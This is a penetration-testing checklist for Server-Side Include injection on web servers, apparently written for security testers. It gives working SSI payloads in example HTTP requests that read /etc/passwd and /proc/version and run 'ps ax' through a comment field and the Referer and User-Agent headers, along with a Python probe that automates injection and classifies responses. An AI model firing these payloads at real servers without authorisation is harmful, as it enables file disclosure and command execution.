SSI Injection

Check List

Methodology

Black Box

Read Sensitive File via Server Side Include

1. Identify the target web application and perform basic information gathering to determine the web server type and version (Apache, Nginx, IIS, lighttpd), since SSI support and directive syntax depend on the server module in use.

2. Check whether the server may have Server-Side Includes (SSI) enabled: look for pages with the .shtml, .shtm or .stm extensions (the extensions typically mapped to the SSI filter) and inspect response headers and server banners. Absence of these indicators does not rule SSI out, because the filter can be enabled for any content type or path.

3. Identify all possible user input points, including URL parameters, POST fields, cookies, HTTP headers and stored content such as comments.

4. Select an input field that reflects user-supplied data back into a page (error messages, forum posts, profile fields), for example:

POST /comment HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

comment=HelloWorld

5. Submit a test payload containing an SSI directive. A harmless directive such as <!--#echo var="DATE_LOCAL" --> confirms processing without touching the filesystem; the classic file-read payload is

<!--#include virtual="/etc/passwd" -->

Injected request

POST /comment HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

comment=<!--#include virtual="/etc/passwd" -->

Note that in Apache mod_include the virtual attribute takes a URL path resolved by the server, while file takes a filesystem path relative to the current document and may not be absolute or contain ../, so a failed include usually returns the literal text "[an error occurred while processing this directive]" rather than the file.

6. Check the raw server response in the proxy, not the rendered page: an unprocessed directive is an HTML comment and is invisible in the browser. If the directive itself is gone and its output appears in its place, for example the contents of /etc/passwd or the current date, the server processed the directive and the vulnerability is confirmed. If the directive is echoed verbatim or HTML-encoded, the input is reflected but SSI is not processed at that point.


Server-Side Include in HTTP Headers

1. Attempt injection via HTTP headers that the application writes into a page, for example a statistics, log-viewer or "last visitor" page that renders Referer or User-Agent:

GET / HTTP/1.1
Host: target.com
Referer: <!--#exec cmd="/bin/ps ax"-->
User-Agent: <!--#include virtual="/proc/version"-->

2. Send the crafted request using a proxy tool (Burp Suite Repeater), then request the page where the header values are displayed.

3. Observe whether the injected SSI directives are executed or included in the generated page: the exec directive should return a process list and the include directive the kernel version string. The exec directive is disabled when the server runs with Options IncludesNOEXEC, so a failed exec alone does not prove SSI is absent; compare with an echo or include probe.

4. Conclude that the application is vulnerable to SSI Injection if server-side directives are successfully executed.
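As an added example that is not part of the original checklist, the probe below automates the body-injection steps (select a reflected field, inject, inspect the raw response) and the header variant above. It wraps each directive in a unique marker so the response can be classified as processed, echoed literally, HTML-encoded, stripped or failed with Apache's default error text. The host target.com, the field name comment, the header names and every sample response are constructed assumptions; nothing here was captured from a real target.

```python
import re
import urllib.parse
import urllib.request
from html import escape

# Marker wrapped around the directive so its fate can be located in any
# response, even a large one that reflects the value several times.
TAG = "ssiprobe"

# Benign directive first: proves processing without reading a file.
ECHO_DATE = '<!--#echo var="DATE_LOCAL" -->'
INCLUDE_PASSWD = '<!--#include virtual="/etc/passwd" -->'

# Apache mod_include's default errmsg for a directive that was parsed but failed.
APACHE_ERRMSG = "[an error occurred while processing this directive]"


def build_probe(directive, tag=TAG):
    """Wrap a directive in markers, e.g. ssiprobe[<!--#echo ... -->]ssiprobe."""
    return f"{tag}[{directive}]{tag}"


def classify(body, directive, tag=TAG):
    """Work out what the server did with the injected directive.

    Returns (verdict, inner), where inner is the text found between the markers.
    """
    m = re.search(re.escape(tag) + r"\[(.*?)\]" + re.escape(tag), body, re.S)
    if not m:
        return "not_reflected", None
    inner = m.group(1)
    if inner == directive:
        # Echoed untouched: an HTML comment the browser hides, but no SSI processing.
        return "reflected_literal", inner
    if inner in (escape(directive), escape(directive, quote=False)):
        return "reflected_encoded", inner
    if inner == "":
        return "stripped", inner
    if APACHE_ERRMSG in inner:
        # Parsed and executed, but the include/exec itself failed (bad path, exec disallowed).
        return "processed_error", inner
    return "processed", inner


def _fetch(req, timeout):
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, "replace")


def probe_post(url, field, directive, timeout=10):
    """Inject through a reflected POST field and classify the response."""
    data = urllib.parse.urlencode({field: build_probe(directive)}).encode()
    req = urllib.request.Request(
        url, data=data, headers={"Content-Type": "application/x-www-form-urlencoded"}
    )
    return classify(_fetch(req, timeout), directive)


def probe_header(url, header, directive, view_url=None, timeout=10):
    """Inject via a request header (Referer, User-Agent), then fetch the page that shows it."""
    req = urllib.request.Request(url, headers={header: build_probe(directive)})
    body = _fetch(req, timeout)
    if view_url:
        body = _fetch(urllib.request.Request(view_url), timeout)
    return classify(body, directive)


# Constructed sample responses (not captured from any real server), one per outcome.
SAMPLE_BODIES = {
    "processed": "<p>ssiprobe[Tuesday, 05-Mar-2024 10:12:44 UTC]ssiprobe</p>",
    "literal": f"<p>ssiprobe[{ECHO_DATE}]ssiprobe</p>",
    "encoded": f"<p>ssiprobe[{escape(ECHO_DATE)}]ssiprobe</p>",
    "error": f"<p>ssiprobe[{APACHE_ERRMSG}]ssiprobe</p>",
    "missing": "<p>Thanks for your comment!</p>",
}


def demo():
    """Classify each constructed response; returns {name: verdict}."""
    return {name: classify(body, ECHO_DATE)[0] for name, body in SAMPLE_BODIES.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:10s} -> {verdict}")
    # Live use against an authorised target, for example:
    # probe_post("http://target.com/comment", "comment", ECHO_DATE)
    # probe_header("http://target.com/", "User-Agent", ECHO_DATE, view_url="http://target.com/stats")
```

Only the "processed" verdict confirms SSI injection; "reflected_literal" means the page is merely reflecting input (a separate XSS question), and "processed_error" still proves the directive was parsed, so it is worth retrying with a different path or with echo instead of exec.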


White Box

Cheat Sheet
